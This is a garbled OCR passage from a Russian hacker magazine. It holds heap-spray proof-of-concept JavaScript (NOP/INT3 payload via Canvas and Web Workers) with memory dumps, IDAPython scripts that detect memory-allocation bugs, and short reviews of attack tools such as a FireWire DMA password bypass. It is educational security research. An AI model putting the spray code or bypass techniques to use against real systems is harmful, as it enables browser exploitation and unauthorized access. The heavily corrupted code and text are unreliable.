гонять ВМР по сети — дело неблагодарное, поэтому очевидно, 
что эту идею можно развить, но гадить в памяти без загрузки ново- 
го контента по сети. На помощь приходит НТМЕ5, который научился 
работать с изображениями и дает это делать всем желающим! 

Да, да, мы говорим о Сапѵаз. Идея проста: 

• Создаем объект сапѵаз. 

• Определяем размер. 

• Получаем 20-контекст. 

• Создаем изображения, используя Р(ЗВА. 
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Новые трюки для Неар 5ргау 



^СРи-ІЫсжі 00000930 



_рсососос 


90 




осососоп 


90 


ЫОР 


ССОСОСОЕ 


90 


НОР 


осососог 


90 


НОР 


ОСОСОСЮ 


90 


НОР 


ОСОСОС11 


90 


НОР 


0С0С0С12 


СС 


ІМТЗ 


0С0С0С13 


90 


МОР 


ОСОСОС14 


90 


МОР 


ОСОСОС15 


90 


МОР 


ОСОСОСІб 


90 


МОР 


ОСОСОС17 


90 


МОР 


ОСОСОСЮ 


90 


МОР 


ОСОСОС19 


СС 


ІКТЗ 




Результат спрея с использованием Сапѵаз 



[м] Метогу тар 




[г]с1>и-1Нгеай00СКИ560 



80808080 


90 


НОР 


80808081 


90 


НОР 


80808082 


90 


НОР 


80808083 


90 


НОР 


80808084 


90 


НОР 


80808085 


90 


НОР 


80808086 


90 


НОР 


80808087 


СС 


ІНТЗ 


80808088 


90 


НОР 


80808089 


90 


НОР 


8080808А 


90 


НОР 


8080808Б 


90 


НОР 


8080808с 


90 


НОР 


80808080 


90 


НОР 



Результат спрея с использованием ѴѴогкег 



• Через РСВАзаносим пейлоад. 

• Тиражируем! 

В итоге мы сделаем то же самое, что и ІтадеЗргау, только те- 
перь по сети ничего не гоняется и мы делаем это в разы быстрее. 

Рос 

<!ООСТУРЕ Іі1:т1> 



I V- I ь 1 1 


могкег.із 






опшеззаее = -РипсИопГе) 1 


ни 

яы 




ѵаг раѵіоасі = [0x90. 0x90. 0x90. 0x90. 0x90. 0x90. <-■ 


ш 

ны 




0x90. 0ХСС1: 


РМ 

НУ 




ѵаг Ітаеесіаіа = е.сіаіа: 


ш 

ну 






НУ 

ни 




( л 1 = 0; 1 < іта§есіа1;а .сіаіа . 1еп§1;Іі; 1++) { 



ѵаг соп1іех1: = е1ет.^е1:Соп1:ех1:( '2с1 ' ^ : 



ѵаг іш^ сі = соп1;ех1;.сгеа1;еІта§еОа1;а(256^ 256); 
бІКіт^сІ. рауІоасІѴ. 



тетогу[і] = іш^сі: 



-ІТ- 



}; < /5сгір1і> 



Видно, что данный пример работает, но все же не так быстро, 
как старый добрый Неар Вргау на чистом ^аѵа5сгір^ Поэтому 
исследователи предложили использовать еще одну фичу: ѴѴеЬ 
ѴѴогкегз. Данный класс позволяет реализовать в контексте вклад- 
ки браузера многопоточное выполнение задач (^аѵа5сгір^кода, на- 
пример). Я немного изменил код с презентации (чтобы он хоть как- 
то заработал, а то любят выкладывать нерабочий код некоторые...), 
и у меня получилось примерно то, что хотели показать авторы: 



іша^есіаііа .сіа1:а[і] = раѵ1оасІ[і % раѵіоасі . Іеп^іііі] ; 






ро5І;Ме55а§е(іта§есІа1;а); 



Мы выносим «поток» копирования пейлоада в данные изо- 
бражения. Именно этот цикл занимает основное время выполнения 
спрея. 

1113111.1111111 

ѵаг тешогу = АггаѵП ; 

ыіпсіоы.опіоасі = () { 

ѵаг ыогкегБ = АггауП; 

ѵаг МАХ ІЛІОККЕК5 = 5: 

-Рог (ѵаг 1 = 0; і < 2000; і++) I 

ѵаг еіе ш = сІоситеп1;.сгеа1;еЕ1етеп1:( ' сапѵаз ' ); 

еіеш.ыісііііі = 256: 

еіеш. Ііеі^ІтІ: = 256; 

ѵаг сопіехі = еІеш.^еІСопІехК ' 2с1 ' ) ; 

ѵаг іт§сІ = соп1:ех1;.сгеа1;еіта§е0а1;а(256^ 256); 

ІІСІ < МАХ ІЛІОККЕК5 )„і 



_ыогкег5[і] = пеы 1лІог кег( 'ыогкег .із ' ) ; 



-І1- 



ыогкегз[і % МАХ ІЛІОККЕК5] . розІіМезза^е(іт^сІ) ; 
ыогкегз[і % МАХ ІЛІОККЕК5] .опшезза^е = 



-Рипсіііоп(е) { 



тетогу[і] = е.сіаіа: 






< зсгірі > 

унг тетогу = Аггау(); 

-Рипсііоп бІКіш^сІ. раѵіоасі) { 

-Рог(ѵаг і = 0; і < іт§сі.сіа1;а.1еп§1;іі; і++) { 
іт§с і.сіа1:а[і] = рау1оасІ[і % рауіоасі . 1еп§1;Іі] ; 

ь 

л 

ыіпсіоы.опіо асі = () { 

ѵаг р аѵіоасі = [0x90^ 0x90^ 0x90^ 0x90^ 0x90^ ^ 

0x90. 0хСС]; 

-Рог (ѵаг 1 = 0: і < 100: і++) { 

ѵаг еіеш = сІоситеп1;.сгеа1:еЕ1етеп1;( 'сапѵаз' ); 

еіеш.ыісііііі = 256; 

еіет. беі^ііі: = 256; 



ъ 



Основной код точно такой же, только копирование пейлоада 
вынесено в воркеры. 

Единственная особенность, которая возникает при данном 
примере, — плотность спрея высока только в средне-нижней части 
карты памяти. Это стоит учитывать для планирования стабильных 
эксплойтов. Тем не менее тема раскрыта, но не до конца: что в пер- 
вом, что во втором примере есть проблемы с плотностью (тестиро- 
валось в Рігеі'ох). Предлагаю читателю самостоятельно улучшить 
показатели Неар Эргау, манипулируя размером изображения 
или с помощью иных хитростей. Главное ведь идея :). ^ 
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рм~а ци я 

І^^йѲі^дрставлена 
ДЕ исключіщльно 
^ в ознакійТйтельных 
' целях. Ни редакция, 
,ѵ- - ни автор не несут 
^ ответственности 
' за любой возможный 
вред, причиненный 
^ материалами данной 



АВТОМАТИЗИРУЕМ 
ПОИСК УЯЗВИМОСТЕЙ, 
ВЫЗВАННЫХ 
НЕКОРРЕКТНЫМ 
ИСПОЛЬЗОВАНИЕМ 
ФУНКЦИЙ АСЮС/РКЕЕ 
С ІОАРѴТНОН 

Естественное желание упростить себе 
жизнь вынуждает автоматизировать поиск 
уязвимостей. Как и прежде, помогать нам будет 
плагин ЮАРуіИоп, позволяющий использовать 
всю мощь Руібоп в отладчике ЮА Рго. Но если 
в прошлый раз мы искали ошибки в циклах 
и переполнения буфера, то в этот раз устроим 
охоту на баги, связанные с функциями 
выделения/освобождения памяти. 



ВВЕДЕНИЕ 

Предыдущие части были сфокусированы на счетчике копирования. 
Сегодня мы сосредоточим внимание на размере выделяемой памя- 
ти, проверке возвращаемых значений и операциях с указателями 
для функций выделения памяти. 

Данными в динамической памяти оперируют функции выделе- 
ния памяти. С семействами функций аііос и І^гее связаны четыре ка- 
тегории уязвимостей: целочисленное переполнение, игнорирова- 
ние проверки возвращаемого значения, повторное освобождение 
памяти и использование освобожденной памяти. Задачу проверки 
на эти категории можно проиллюстрировать схемой, представлен- 
ной на рисунке 1. 

РАЗМЕР ИМЕЕТ ЗНАЧЕНИЙ 

Арифметические операции с параметром аііос-функций приводят 
к тому, что выделяется недостаточное количество памяти для бу- 
фера. Следствием этого является переполнение в куче. На примере 
из рисунка 2 можно увидеть, что с параметром таііос происходит 
интересное. 

Подобная арифметическая ошибка была найдена недавно в бра- 
узерном протоколе 5іеат, в обработчике графических файлов ТСА. 

асісі еах^еах 
асісі еах^еах 
ризіі еах 

саіі таііос ыгаррег 

Для идентификации этого паттерна используется, как обычно, 
трассировка и анализ операндов инструкций. Задача предельно 
проста: от начальной точки — функции выделения памяти, трас- 
сируя вверх, обращать внимание на математические инструкции. 



080 



ХАКЕР 12/167/2012 



© Ліскг.сот/реорІе/дІаІИ 
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где нулевой операнд — трассируемое значение. Но одной функцией 
таііос семейство аллокаторов не ограничено. Сюда относятся также 
ІосаІАІІос, ЗузАІІосЗігіпд и так далее. Для скрипта-помощника 
важно лишь, что во всех этих функциях присутствует слово «аііос» 
и что у части из них параметр «размер» не один. Это обуславливает 
дополнительную небольшую задачу для скрипта — найти нужный 
ризЬ. Например, объект трассировки у ІосаІАІІос — нулевой операнд 
второго ризЬ'а, а у таІІос — первого и единственного ризЬ'а. В зада- 
че проверки на іпіедег оѵегЛоѵѵ одна из вкусностей в том, что размер 
выделяемых байтов для функции выделения может вычисляться 
динамически (например, быть возвращаемым зігіеп-ііке функцией). 
Подобный пример ты можешь увидеть на рисунке 3. 

Код, выполняющий простейший анализ 

# Список арифметических инструкций 

та1:Іі5=[ 'іп с' . 'асісі' . 'шиі' . 'ітиі' . 'Іеа' . 'тоѵзх' . <-> 

'сіес ' . 'зиЬ' . 'зііі' . 'зііг' ] 

# Для функции таііос ищем первый ризіі 

^^ог 5І:ер іп гап§е(5): 

еа=Кбг5І:В(еа^ 

# Покрас ка удобна для отладки и нагля дности 

5е1:Со1ог (еа.СІС_ІТЕМ.0хсЬе4е4^ 

і-р СеШпет(еа)== ' ризб ' : 

# Проверка на константу 

і-р 6е1:ОрпсІ(еа.Ѳ)==5: 

Ьгеак 

# Находим объект трассировки _ 

1;гасеѵа1=Се1;ОрпсІ(еа^0) _ 

Ьгеак 

5І:ер=+1 

ыЬіІе еа!=рагеп1і: 

5е1:Со1ог(еа,СІС_ІТЕМ,0хсЬе4е4) 

еа=Кбг5І:В(еа) 

# Ищем трассируемый операнд 
і-р Се1:ОрпсІ(еа^0)==1:гасеѵа1: 

# Вли яют ли математические инструкции на будущий 

# размер 

і:^ Се^ІіМпет(еа) іп шаІіЬз: 

і-р 6е1:Мпепі(еа^=='1еа' : 

# Іеа причастна только при сложении 

і-р ' + ' П 0 І: іп СеіОрпсКеа Л) : 

Ьгеак 

# Сообщаем о возможной арифметической ошибке 

Р г і пі ' I а_ ѵісі а Аііос а аі асі с ігезз ' , Ье х(еа) 

ОГЛЯДЫВАЯСЬ НАЗАД 

Если возвращаемое значение неправильно интерпретируется 
или попросту игнорируется, то поведение программы можетстать 



пои 


еаx^ 


[еЪр+агд 01 


8Ы 


еаx^ 


г 


Іеа 


есx^ 


[еах+еах+ЗѲЫ 


пои 


егі ^ 


егр 


ривЬ 

саіі 


есх 

Лзітаііос 



Рис. 2. Арифметическая ошибка в браузерном протоколе Зіеат 



саіі А5:_іпр_І5ѣг1елЫв4 ; ІгігІелІііСх) 
той е^і^ еах 

іпс С5І 

Іеа еаx^ [езо+еБІ] 

ризЬ еах ;сЪ 

саіі _ітр_СоТа8кПепЙ11осІ>4 ; СоТазкИетйИосСх) 



Рис. 3. Размер выделяемых байтов для функции вычисляется динамически 

непредсказуемым. Мы должны осматривать функции выделения 
памяти, поскольку многие уязвимости были связаны с отсутствием 
проверки возвращаемогозначения. 

Книга по исследованиюуязвимостей 
ТИеАгІоіЗоНѵѵагеЗесигііуАззеззтепі 

Отсутствие проверки значения, возвращаемого функцией выде- 
ления памяти, часто служит причиной захвата потока управления 
дефектной программы. В ѴѴіпбоѵѵз существует несколько различ- 
ных функций выделения памяти. Из них в изег тосіе — ІосаІАІІос, 
5узАІІос5ігіпд, геаііос и в кегпеі тосіе — ЕхАІІосаІеРооІѴѴііЬТад. 



Также присутствует множество оберток функций, выделяющих 
память, наподобие МЮІ_и5ег_аІІосаІе. В примере ниже значение, 
отданное ІосаІАІІос (в регистре еах) без проверки, служит аргумен- 
том для функции МіАсІ)и5ІРгіѵіІеде5Токеп. 

робЬ еах ; иВѵіеБ 


риБЬ 


еЬх ; иРІа^Б 


тоѵ 


[ еЬр+аге 4] . еах 


саіі 


сІБ : ІосаІАІІос (x^x) 


Іеа 


есх^ [еЬр+иВуіеБ] 


риБЬ 


есх 


риБЬ 


еах ; а11 іпри-І: аге еѵіі! 


риБЬ 


[еЬр+аг§_4] 


тоѵ 


[еЬр+ЬМет]. еах 


риБЬ 


[еЬр+ѵаг 4] 


риБЬ 


еЬх 


риБЬ 


[еЬр+ѵаг_8] 


саіі 


есіі ; М-І:АсІдиБ-І:Ргіѵі1е§еБТокеп(х^х^х^х^х^х) 



Задача автоматического анализа этого паттерна сводится к про- 
верке, является ли регистр еах операндом инструкции сравнения 
(стр, Іезі). В этом случае будет ясно, что возвращаемое значение 
сравнивается с нулем. Код, выполняющий эту нехитрую задачу: 

1:е5І:5=[ ' сшр ' . Чезі: ' ] 

-Рог 5І;ер іп гап§е(5): 

еа=КРіг5І:(еа) 

5е1;Со1ог(еа,СІС_ІТЕМ,0хсЬе4е4) 
і-р Се1;Мпет(еа) іп іеБІіБ: 

і-р Се1;ОрпсІ(еа^0)== 'еах' ог Се1:ОрпсІ(еаД)=='еах' : 
Ьгеак 

ргіпі; 'N 0 сЬеск геіигп ѵаіие аі асІсІгеББ ' ^ Ьех(еа) 
БІ:ер=+1 

Отправной точкой для анализа вышеописанных паттернов 
уязвимостей служит, конечно же, одна из функций выделения 
памяти. Для примера ниже приведен код, обходящий всю базу ЮА 
в поисках вызовов таііос: 
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Рис. 4. Указатель на освобожденную память ріг читается в регистр еах 

-Рог 5е^_еа іп 5е^теп1:5П: 

■Рог еа іп НеасІ5(5е§_еа^ 5е§Епс1(5е§_еа) ) : 

і-р І5СосІе(6е1:Р1а§5(еа^^ : 

і-р беІіМпепі(еа’) == "саіі": 

і-р ге.та1:сіі( ' . *та11ос . * ' ^Се1:ОрпсI(еа^0) ) : 
аііох.аррепсі(еа) 

Описанный тип уязвимости является логической ошибкой и при- 
сутствует в каждом языке. 

Итак, векторы исследований от аллокаторов направлены вверх 
и вниз — в поисках арифметики и проверки на нуль. Перейдем 
к уязвимостям, связанным с функциями освобождения памяти. 

РРАУ-АРТЕР-РРЕЕ 

Озе-аЙег-І'гее — весьма распространенный баг, сущность которого 
кроется в самом названии — использование после освобожде- 
ния. Возникает вследствие некорректных операций программы 
с указателем (как и в случае с боиЫе І^гее). В последнее время этот 
вид уязвимостей в адвизори-лентах светится все чаще — СѴЕ- 
2012-0469, СѴЕ-2012-1529, СѴЕ-2012-1889. Идея эксплуатации этого 
бага состоит в том, чтобы после освобождения объекта в памяти 
заставить программу выделить фейковый кусок памяти (или пере- 
полнить буфер), а затем программа сама «использует» объект 
(на благо атакующего). Эксплуатация этого типа уязвимостей 
выполняется посредством техники распрыскивания кучи, которая 
и создаст подложный объект. Этого пациента можно идентифи- 
цировать через проверку доступа к указателю после освобожде- 
ния. Трассировка «вниз» позволяет локализовать места доступа 
к указателю. 

Взглянем на иллюстрацию, представленную на рисунке 4. Здесь 
мы видим, что указатель на освобожденную память ріг читается в ре- 
гистр еах. Такого рода ситуации обнаруживаются следующим кодом: 

# Пока не встретил ась проп э 

ыііііе еа!=0хРРРРРР РР: 

еа=К1іг5І:(еа’) 

5е1:Со1ог(еа ^ СIС_IТЕМ^ 0хсЬе4е4) 

# Кто-нибудь использует трассируемое значение? 

і-р 6е1:0рпсІ(еа .0)==1:гасеѵа1 ог <-■ 

6е1;0рпсІ(еа Д)==1;гасеѵа1: 

ргіпі; "шау Ье изесі а-Ріег -Ргее" Дгасеѵаі^ Ііех(еа) 

Ошибка боиЫе І^гее подобна изе-аЙег-І'гее тем, что после 
освобождения определенного фрагмента памяти также пытается 
использовать указатель. 

ОСВОБОДИТЬ ОСВОБОЖДЕННОГО 

Читатель, исследующий бинарный код, уже отметил, что на иллю- 
страции также присутствуетуязвимость сІоиЫе-І'гее — повторное 
освобождение памяти ( доо.аІ/925РЬ ). Уязвимость подобного рода 



ріг = (сЬаг *) та11ос((зІ2е*4+зІ2ео^(Ьи^)*4)*2); 
^ипс2(Ьи^,р-Ьг); 

□ іп-Ь ^ипс2(с1іаг сЬаг ^р'Ьг) { 

^гее(р-Ьг); 

^гее (ріг) ///освободить освобожденного 
ргіп-Ь^( "%р", р-Ьг) ///чтение указателя 

} 



Рис. 5. Указатель ріг используется в качестве аргумента к Ігее дважды 

возникает при попытке освободить тот фрагмент памяти, который 
система уже считает освобожденным. Уязвимость класса боиЫе 
І^гее так же, как и изе-айег-^гее, используется для манипуляций 
с метаданными кучи. Пресловутый указатель ріг используется 
в качестве аргумента к І^гее дважды. Приведенный выше пример 
из ЮА является результатом простого С-кода, представленного 
на рисунке 5. 

В дебрях ассемблера поиск потенциально дважды освобож- 
денного сводится к поиску указателя, повторно используемого 
в качестве аргумента. Отправная и конечная точка поиска — вы- 
зов і^гее. Объект трассировки — указатель. Различия в количе- 
стве параметров у разных «освободителей» типа НеарРгее, І^гее, 
ѴігІиаІРгее в плане идентификации указателя функции легко 
решаются — просто от начала вызова ищется определенный ризЬ. 
Задача идентификации ошибки повторного освобождения памяти, 
на первый взгляд, простая. Но ограничение статического анализа 
порой состоит в невозможности найти родительскую функцию 
(в случае с виртуальными функциями). Все же этот вид уязвимости 
можно локализовать с помощью приведенного ниже кода. Смысл 
его — двигаясь от вызова І^гее вверх, искать другой вызов функции 
освобождения, чтобы сравнить указатель с трассируемым. 

# Пропасть вводит ІРА в бесконечный цикл 

ыііііе еа ! =0хРРРРРРРР: 

# Красим путь 

$еіСо1ог(еа.СІС ІТЕМ.0хе5-РЗ-р-Р^ 

# Получить ссылку 

еа=Кбг5І:В(еа^ 



; іпѣ_еЛес1 Гипс2Сіпѣ^ иоіЛ 
Гипс2 ргос пеаг 

иаг_СО= Ъуіе рѣг -ОСОЬ 



ріг= 


АыогЛ 


рѣг ѲсЬ 


рЦ5Ь 


еЪр 




той 


еЪр, 


езр 


гиЪ 


егр^ 


ѲСѲЬ 


рц5Ь 


еЪх 




ризЬ 


С5І 




ригЬ 


еаі. 


[еЪр+иаг СО! 


пои 


есx^ 


ЗѲЬ 


той 


еаx^ 


ОССССССССЬ 


гер біобА 




пои 


С5І ^ 


еар 


той 


еаx^ 


[еЪр+рѣг] 


ригЬ 


еах 


:Иеіпогу 


саіі 


Л5:Ггее 



Рис. 6. функция Щпс2 собственной персоной 
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Наказуемая беспечность 



пои 


[еЪр+рѣг]« еах 


пои 


еах< [еЪр+ріг] 


ризЬ 


еах ;ріг 


Іеа 


есх< [еЪр+иаг_1С] 


ризЬ 


есх ;іпѣ 


саіі 


иі*арреі‘_і'илс2 



Рис. 7. Враппер, вызывающий функцию ^ипс2 

# Проверка: были ли мы тут 

і-р Се1;Со1ог(еа,СІС_ІТЕМ)==0хе5-РЗ-р-Р: 

Ьгеак 

# Ищем вызов -Ргее 

і-р 6е1:Мпет(еа^== ' саіі ' : 

і-р '-Ргее' іп Се1;ОрпсІ(еа^0) : 

^^о^ 5І:ер іп гап^е(5): 

еа=КРіг5І:В(еа) 

5е1;Со1ог(еа,СІС_ІТЕМ,0хсЬе4е4) 

і-р 6е1:Мпет(еа’)== ' ризРі ' : 

# В переменную операн д рц5Іт*а 

ѵа1=Се1:ОрпсІ(еа^0) 

Ьгеак 

5І:ер=+1 

# Пять шаг ов на поиск возможного источника 

^ог 5І:ер іп гап^е(5): 

еа=Кбг5І:В(еа) 

5е1;Со1ог(еа^СІС_ІТЕМ,0хсЬе4е4) 

і-р 6е1:Мпепі(еа)== 'шоу' : 

ѵа1=6е1:0рпсі(еа Л) 

Ьгеак 

5І:ер=+1 

# Ключевая проверка 

і-р ѵа1==1:гасеѵа1 : 

ргіп-І: 'сІоиЫе -Ргее', ЬехРеа^ 

При глобальном анализе, по всей базе дизассемблера ЮА (ібЬ- 
файлу), целесообразно после работы с функцией освобождения 
памяти перекрашивать за собой пройденный окрашенный путь, 
поскольку алгоритм построен так, что анализирующие функции 
используют покраску, чтобы не попасть в бесконечный цикл. Чи- 
стильщик представлен ниже: 

сіе-р Сіеапег(еа) : 

# Бэкапим адрес 
с1оыпеа=еа 

# Обеление 

5е1:Со1ог(еа.СІС_ІТЕМ. 0хРРРРРРРП 

ыЬіІе еа!=0хРРРРРРРР: 

# Идем вверх 

еа=КРіг5І:В(еа^ 

# Вы еще не отбелились? 

і-р 6еіСо1ог(еа.СІС_ІТ ЕМ^ ! =0хРЕРРРР РР : 

# Тогда мы идем к вам 

$е1:Со1ог(еа.СІС ІТЕМ. 0хРРРРРРРР) 

# Иначе уходим 

еІ5е: 

Ьгеак 

ыЬіІе сіоыпеа ! =0хРРРРРРРР : 

# Идем вниз 

сІоѵ\/пеа=Кбг5І:(сІоѵ\/пеа) 

# Аналогично 

і-р 6еіСо1ог(сІоыпеа. СІС_ІТЕМЛ=0хРРРРРРРР: 

$еіСо1ог(сІоыпеа .СІС ІТЕМ. 0хРРРРРРРР) 

еІ5е: 

Ьгеак 



ОШИБКИ ПОВТОРНОГО 
ОСВОБОЖДЕНИЯ ПАМЯТИ 
ГОРАЗДО ПРОЩЕ НАХОДИТЬ 
ДИНАМИЧЕСКИМ АНАЛИЗОМ 

На практике ошибки повторного освобождения памяти гораздо 
проще находить динамическим анализом. Дело в том, что между 
вызовами функций І^гее, как правило, находится не десяток 
инструкций, а множество функций. Поэтому статический анализ 
здесь эффективно использовать лишь вместе с межпроцедурным 
анализом. 

ВВЕДЕНИЕ В МЕЖПРОЦЕДУРНЫЙ АНАЛИЗ 

Говоря простым языком, межпроцедурный анализ — тот анализ, 
который на основе исследования входных и выходных данных 
подпрограмм рисует картину взаимодействия между функциями. 

На рисунке 6 мы видим функцию 1"ипс2, где один из аргументов — 
указатель ріг. Вызывается эта функция из листинга, представлен- 
ного на рисунке 7. 

Согласно конвенции вызовов зісісаіі, ріг попадает в 1"ипс2 через 
стек с помощью второго снизу ризЬ'а. Дотянуться до трассируемого 
значения межпроцедурно в данном случае очень просто. Ступени 
к победе таковы: 

1. Найти трассируемого в фрейме функции. То есть вычислить пол о- 
жениеаргумента (относительно другихаргументов, переменных) 
встековом фреймефункции^ипс2 (вызываемой функции). 

Для примера приведу код, выводящий на экран содержимое 
фрейма функции: 

# Получаем фрейм функции 

Біаск-Ргаше = 6е1:Ргапіе(^е1:_5сгееп_еаП ) 

# Запрашиваем размер 

-Ргатезіі е = Се1:51;гис5І2е(5І:аск_-Ргате) 

# Массив для работы с содержимым фрейма 

5І:к_ѵаг5=[ ] 

ыЬіІе -Ргате__соип-І;ег < -Ргате_5І2е: 

# Перебираем имена переменных 

Біаск ѵаг = Се1:МепіЬегМате(5І:аск_-Ргапіе. -Ргаше соип-Рег^ 

і-р БІ:аск_ѵаг!=Мопе: 

ргіп-І; " Біаск ѴагіаЫе: %б " % (БІ;аск_ѵаг) 

# Сохраняем имена 

БІ;к_ѵагБ .аррепсІ(БІ;аск_ѵаг) 

Тгашесоип-Рег += 1 

# Вывод результата 

-Рог ѵаг іп Бік ѵагБ: 

ргіп-І; "Біаск ѵаг: ".ѵаг 

2. Найти путь наверх. То есть с помощью перекрестных ссылок най- 
ти, какая функция вызываеттекущую. 

3 Найтитрассируемогов прошлойжизни предыдущей функции 
(в примере рігбыл регистром еах). 

Перед реализацией этих шагов стоит почитать пост автора ЮА 
Рго о межпроцедурном анализе через анализ стековых пере- 
менных ( ѵѵѵѵѵѵ.ЬехЫод.сопп/?р=42 ). Отмечу, что у скрипта, который 
ты найдешь на прилагаемом к журналу диске, помимо отсутствия 
взаимодействия меж функциями, существуют следующие огра- 
ничения: неполный охват кода, отсутствие проверки операций 
с указателем (в деле поиска ошибок боиЫе і^гее), работа с ограни- 
ченным количеством представителей семейств функций выделе- 
ния и освобождения памяти (таііос и І^гее). На этом всё. Удачи! ^ 
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ѵѵАвнтс 



Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 



СОФТ ДЛЯ ВЗЛОМА и АНАЛИЗА БЕЗОПАСНОСТИ 





Авторы: 

^ате5 РогзНаѵѵ, 
МісНаеІ ^огсIоп 

УРІ: 

сопІехІІБ.сот/ге- 

зеагсНЛооІз/сапаре 

Система: 

ѴѴіпсІоѵѵз 





Автор: 

Сагзіеп Маагітапп- 
Мое 

УКІ: 

Ьгеакпепіег.огд/ 

ргоіесіз/іпсерііоп 

Система: 

Ыпих/Мас 




НА5Н ЕХТЕМРЕР 

Естьтакой классический тип атак — НазЬ 
ІепдіЬ ехіепзіоп. Уязвимы к ней многие рас- 
пространенные хеш-алгоритмы — и М05, 
и 5НА-1. Если точнее — те, что основываются 
на структуре Меркла — Дамгарда. Данная 
атака позволяет сгенерировать корректное 
хеш-значение для удлиненного исходного 
сообщения. Точнее, если мы знаем значение 
хеша от строки (зесгеікеу+сіаіа), знаем значе- 
ние 6а\а, но не знаем значение зесгеікеу, то мы 
все равно можем сгенерировать хеш для из- 
начальной строки и нашей строки. То есть 
Н(зесгеІкеу+сІаІа+аррепсІаІа). 

Суть атаки заключается в том, что мы мо- 
жем привести в правильную форму изначаль- 
ные данные (добавив рабсііпд, длину строки, 
произведя конвертацию), добавить наши дан- 
ные и как бы «продолжить» хеш-функцию с из- 
вестной позиции — изначального значения 
хеша. С ЬазЬ_ех1епс1ег мы имеем возможность 
получить итоговый хеш в пару кликов. Отметим 
следующие особенности софтины: 

• все основныехеш-функции — М04/5, 
РІРЕМО-160,5НА/-1/-256/-512,ѴѴЬігІрооІ; 

• генерацияхешей для диапазона длин 
секретной строки, что удобно, когда она 
неизвестна и требуется перебирать воз- 
можныезначения; 

• разнообразные варианты ввода и вывода 
данных. 



САМАРЕ 

Сапаре — это инструмент для тестирования 
работы любых сетевых протоколов, но наи- 
более полезен он при работе с бинарными 
протоколами. 

Программа имеет встроенный функционал, 
реализующий стандартные сетевые прокси, 
и предоставляет возможность захватывать 
и модифицировать трафик от сервера и к сер- 
веру. Ядро данного инструмента может быть 
расширено с помощью множества языков про- 
граммирования, включая С# и РуіЬоп, для пар- 
синга любого протокола с учетом необходимых 
требований прокси и модификации данных. 

Программа работает на сетевом уровне 
и поддерживает ТСР- и ІЮР-соединения через 
рогі І^огѵѵагсііпд или реализацию 50СК5- или 
НТТР-прокси. Так что инструмент не захваты- 
вает данные на ЕіЬегпеІ-, ІР- или ТСР-уровне 
напрямую. Главное, что дает инструмент чело- 
веку, тестирующему новый неизвестный би- 
нарный протокол, — сводит к минимуму усилия 
для его эффективного тестирования. Можно 
как очень быстро написать фаззер для поиска 
различных переполнений, так и просто произ- 
водить МІТМ-атаки. 

Также из особенностей инструмента можно 
выделить построение модели состояний про- 
токола, которая отображается в виде графа 
состояний. Инструмент был впервые пред- 
ставлен на ВІаск Наі Еигоре 2012. 



ОТМЕНЯЕМ ГРАНИЦЫ ДОСТУПА 

Іпсерііоп предоставляет стабильный и про- 
стой путь для выполнения различных хаков 
с памятью на включенных машинах, исполь- 
зующих ІЕЕЕ 1394 5ВР-2 ОМА. Инструмент 
может разблокировать и поднять привилегии 
до ЕосаІ Асітіпізігаіог/ гооі на почти любой 
машине с интерфейсом РігеѴѴіге, к которому 
есть физический доступ. 

В первую очередь Іпсерііоп предназначен 
для атак против компьютеров, которые ис- 
пользуют полное шифрование дисков, такое 
как ВііЕоскег, РіІеѴаии, ТгиеСгурІ или Роіпізес. 
Также инструмент будет полезен для специ- 
алистов по реагированию на инциденты 
и цифровой экспертизы, когда они сталкива- 
ются с включенной машиной. 

Благодаря ОМА происходит поиск по всем 
доступным страницам памяти сигнатур 
по определенным смещениям в модулях 
парольной аутентификации операционной 
системы. После того как найден нужный 
участок кода, инструмент помогает обойти 
код, ответственный за неправильный ввод 
пароля. В итоге любой введенный пароль 
будет правильным. При этом исправление 
в памяти будет не постоянным, и после пере- 
загрузки все вернется к нормальной работе 
парольного функционала, что теоретически 
позволяет атакующему остаться практиески 
незамеченным. 
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7 утилит для исследования безопасности 



ПРИШЕЛ ЕЦАТАКУЕ1" 

Мікіо — это сканер веб-серверов с откры- 
тым исходным кодом, который производит 
комплексное тестирование веб-серверов 
по многочисленным пунктам, включая проверки 
на более 6500 потенциально опасных сценари- 
ев, проверки на устаревшие версии для более 
1250 серверов и специфические проблемы (270). 
Программа также проверяет конфигурацию 
элементов сервера, например наличие мно- 
жественной индексации файлов, НТТР-опции 
сервера и попытки идентифицировать установ- 
ленные веб-службы и программное обеспече- 
ние на сервере. Полноценная поддержка прокси 
(с возможностью авторизации) при правильном 
подходе обеспечит тебе безопасность. Правда, 
о незаметном сканировании придется забыть. 

С самого начала разработчики сделали упор 
на скорость скана, не заморачиваясь по поводу 
БІеаШп-методов. 



С другой стороны, ядро Мікіо составляет 

известная библиотека ЫЬѴѴЫзкег, у которой 

в арсенале есть несколько методик для обмана 

Ю5. Основные особенности: 

• поддержка 551 и НТТР ргоху; 

• проверки на устаревшие компоненты сервера; 

• сохранение отчетов в ріаіп 1;ех1;, ХМІ, НТМІ, 
МВЕилиС5Ѵ; 

• движок шаблонов отчетов; 

• сканирование множества портов на сервере 
или множества серверов; 

• ІіЬѴѴЬізкег'з Ю5 методы кодирования; 

• определениеустановленного ПО через 
заголовки, і^аѵісопз и файлы; 

• хост-аутентификация с Вазіс и МТІМ; 

• отгадывание поддоменов; 

• определение пользователей в АрасЬе 
и сдіѵѵгар; 

• настройка проверяемых групп уязвимостей; 




Авторы: 

СНгІ5 ЗиІІо, 

ОаѵісІ Іосіде 

ЦРІ: 

ѵѵ\л/\л/.сігТпеі/пік1о2 

Система: 

ѴѴіпсІоѵѵБ/Ыпих 



• техники уменьшения количества 
ложных срабатывай ИЙ; 

• интерактивный статус, пауза и изменение 
настроек детализации; 

• сохранениезапроса/ответа для 
успешныхтестов; 

• повтор сохраненныхуспешныхтестов; 

• автопауза по таймеру; 

• вход в Меііазріоіі;. 
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Автор: 

ргсіеіка 

ЦРІ: 

пиіізесигііу.пеі/ 

ЬасксІоог.ЫппІ 

Система: 

Мае 




Автор: 

ЗіерНеп Реѵѵег 

ЦРІ: 

Иир5://дііИиЬ.сот/ 

5ІерНеп^е\л/ег/дгіпсІег 

Система: 

ѴѴІПСІОѴѴБ 
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сс 
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Автор: 

ЗіРАТеат 

ЦРІ: 

сІІ.БІгаІооІ.сот 

Система: 

Ыпих 




ПРЯЧЕМСЯ В ЯБЛОКЕ 

Руткитов под ѴѴіпсІоѵѵз и Ыпих пруд пруди, 
а вот под Мае 05 X днем с огнем не сыщешь 
